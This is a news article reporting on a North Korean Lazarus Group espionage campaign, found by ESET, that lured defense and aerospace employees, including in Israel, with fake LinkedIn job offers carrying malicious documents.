Read more in Calcalist
The attack, carried out by the Lazarus Group, whose activities are identified with North Korea and aimed at the defense industries, is part of an organized and ongoing campaign. Most cyber experts have been referring to the Lazarus Group for years as an arm of the North Korean intelligence agency. Kim Jong Un’s army holds a corps of about 6,000 active hackers. According to information received by Calcalist from sources in the Israeli cyber industry, the group has been running its campaign for about two years and the goals include countries in Western Europe, Chile and of course Asian countries.
The concern is that the North Korean hackers passed sensitive information to Iran. The Islamic Republic has been trying to attack critical infrastructure in Israel for the past six months, and has reportedly even infiltrated Mekorot’s computer. Shortly afterwards, it was reported that the activity of one of the major ports, that Ahid Rajai in Iran had been shut down due to a cyber attack last May that according to foreign publications was attributed to Israel. It is not clear if there is a connection between these actions, but since North Korea’s campaign is probably intended for espionage and not physical harm, so it could very well be that it is not directly related to these reports.
The current campaign, which also affected Israel, was identified two months ago by the Slovak cyber company ESET and the information about it was passed on to all relevant parties. Lazarus group attacks are designed for two main purposes, information theft and money. The group’s activity serves as a means of bringing foreign currency into Pyongyang. The use of LinkedIn is due to the fact that it is very easy to transmit messages on the social network and disguise cyber damage in documents transmitted within its framework.
In recent years, a number of vulnerabilities in LinkedIn’s security mechanisms have been revealed that have enabled this and have since been fixed. It is not clear if the current campaign has used these weaknesses or newer ones that have not yet been fixed. According to ESET’s cyber researchers, the files were transferred directly via LinkedIn or via an email containing a OneDrive link for which the attackers created appropriate email accounts for their fake LinkedIn advertisements.
Once the recipient opened the file, a seemingly innocent PDF document was presented with information about the salary offered for the fake work. In this way, damage was actually inflicted on the victim’s computer and the attackers gained an initial foothold into the system. Next the attackers carried out targeted attacks against European airlines and space. Among the tools they used was a multi-stage and customizable malicious app that impersonated legitimate software and various versions of an open tool. In addition, they also misused Windows utilities to perform additional operations.
“The attacks we investigated showed all the signs of espionage, with a number of clues suggesting a possible link to the infamous Lazarus hacker group. However, neither the malware analysis nor the investigation itself allowed us to gain insights into which files the attackers targeted,” Clarsky added. In addition to the espionage operations, ESET investigators found evidence that the attackers tried to use hacked accounts to steal money from other companies.